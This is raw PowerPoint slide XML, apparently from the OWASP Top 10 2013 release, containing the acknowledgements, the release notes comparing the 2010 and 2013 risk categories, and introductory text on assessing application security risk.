                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId22"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="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23"/>
                        </a:rPr>
                        <a:t>WhiteHat Security Inc.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId24"/>
                        </a:rPr>
                        <a:t>Statistics</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0"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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>We would like to thank everyone who contributed to previous versions of the Top 10. Without these contributions, it wouldn’t be what it is today. We’d also like to thank those who contributed significant constructive comments and  time reviewing this update to the Top 10:</a:t>
                      </a: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u="none" kern="1200" baseline="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Adam Baso (Wikimedia Foundation)</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Mike Boberski (Booz Allen Hamilton)</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Torsten Gigler</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Neil Smithline – (MorphoTrust USA) For producing the wiki version of the Top 10, and also providing feedback</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="22860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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>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1" name="Text Placeholder 10"/>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I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3">
            <a:hlinkClick r:id="rId11"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId25" cstate="print">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId26">
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="-20000" contrast="-40000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="4688670"/>
            <a:ext cx="1752600" cy="416730"/>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72093261"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="455676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What Changed From 2010 to 2013?</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9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threat landscape for applications security constantly changes. Key factors in this evolution are advances made by attackers, the release of new technologies with new weaknesses as well as more built in defenses, and the deployment of increasingly complex systems. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>To keep pace, we </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>periodically </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>update the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>OWASP Top 10. In this 2013 release, we made the following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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Broken Authentication and Session Management moved up in prevalence based on our data set. We believe this is probably because this area is being looked at harder, not because these issues are actually more prevalent. This caused Risks A2 and A3 to switch places.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000" kern="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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Cross-Site Request Forgery (CSRF) moved down in prevalence based on our data set from 2010-A5 to 2013-A8. We believe this is because CSRF has been in the OWASP Top 10 for 6 years, and organizations and framework developers have focused on it enough to significantly reduce the number of CSRF vulnerabilities in real world applications.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000" kern="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t>We broadened Failure to Restrict URL Access from the 2010 OWASP Top 10 to be more inclusive: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t>2010-A8: Failure to Restrict URL Access is now </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A7: Missing Function Level Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> – to cover all of function level access control. There are many ways to specify which function is being accessed, not just the URL.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t>We </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>merged and broadened 2010-A7 &amp; 2010-A9 to CREATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A6: Sensitive Data Exposure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a: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6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t>This new category was created by merging 2010-A7 – Insecure Cryptographic Storage  &amp; 2010-A9 - Insufficient Transport Layer Protection, plus adding browser side sensitive data risks as well. This new category covers sensitive data protection (other than access control which is covered by 2013-A4 and 2013-A7) from the moment sensitive data is provided by the user, sent to and stored within the application, and then sent back to the browser again.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>We </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>added: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A9: Using Known Vulnerable Components</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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sz="600" kern="12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t>This issue was mentioned as part of 2010-A6 – Security Misconfiguration, but now has a category of its own as the growth and depth of component based development has significantly increased the risk of using known vulnerable components.</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3143957140"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5744683"/>
          <a:ext cx="6858000" cy="3399317"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="351833">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2010 (Previous)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2013 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(New)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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A3 – Broken Authentication and Session Management</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A2 – Broken Authentication and Session Management</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A2 – Cross-Site Scripting (XSS)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A3 – Cross-Site Scripting (XSS)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A4 – Insecure Direct Object References</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A4 – Insecure Direct Object References</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no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A6 – Security Misconfiguration</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A5 – Security Misconfiguration</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A7 – Insecure Cryptographic Storage –</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Merged with A9 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></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A6 – Sensitive Data Exposure</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A8 – Failure to Restrict URL Access – Broadened</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></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A7 – Missing Function Level Access Control</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A5 – Cross-Site Request Forgery (CSRF)</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A8 – Cross-Site Request Forgery (CSRF)</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&lt;buried</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> in A6: Security Misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>&gt;</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A9 – Using Known Vulnerable Components</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A10 – Unvalidated Redirects and Forwards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A10 – Unvalidated Redirects and Forwards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A9 – Insufficient Transport Layer Protection</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Merged </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>with</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t> 2010-A7 into new</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> 2013-A6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Release Notes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RN</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04800" y="2085975"/>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Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Agents</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>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a:t>
                </a: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Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Vectors</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRP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Weaknesses</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRP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Technical</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Business</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sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3076575"/>
              <a:ext cx="685800" cy="428655"/>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Function</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>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1" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="3810000"/>
              <a:ext cx="457200" cy="381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Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>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Controls</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Security Risks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>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Risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1393716450"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4572000" y="5105401"/>
          <a:ext cx="2286000" cy="4045579"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2286000"/>
              </a:tblGrid>
              <a:tr h="328300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>References</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710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57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId4"/>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5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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6"/>
                        </a:rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>External</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:hlinkClick r:id="rId4"/>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7"/>
                        </a:rPr>
                        <a:t>FAIR Information Risk Framework</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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8"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modeling (STRIDE and DREAD)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" u="sng"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u="sng" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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187045732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5105401"/>
          <a:ext cx="4495800" cy="4039178"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4495800"/>
              </a:tblGrid>
              <a:tr h="334702">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>What’s </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" u="sng" dirty="0" smtClean="0"/>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> Risk?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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703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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Only you</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack, or the technical impact may not make any difference to your business. Therefore, you should evaluate each risk </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>for yourself</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, focusing on the threat agents, security controls, and business impacts in your enterprise. We list Threat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Agents</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> as Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific, and Business Impacts as Application / Business Specific to indicate these are clearly dependent on the details about your application in your enterprise.</a:t>
                      </a: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The names of the risks in the Top 10 stem from the type of attack, the type of weakness, or the type of impact they cause. We chose names that accurately reflect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the risks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and, where possible, align</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> with common terminology most likely to</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> raise awareness.</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685612557"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="3873909"/>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What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Are Application Security Risks?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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492909">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> may </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="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the overall risk.</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853213688"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="152400" y="6248400"/>
          <a:ext cx="4191001" cy="1051560"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="620889"/>
                <a:gridCol w="737306"/>
                <a:gridCol w="737306"/>
                <a:gridCol w="737306"/>
                <a:gridCol w="672392"/>
                <a:gridCol w="685802"/>
              </a:tblGrid>
              <a:tr h="152400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
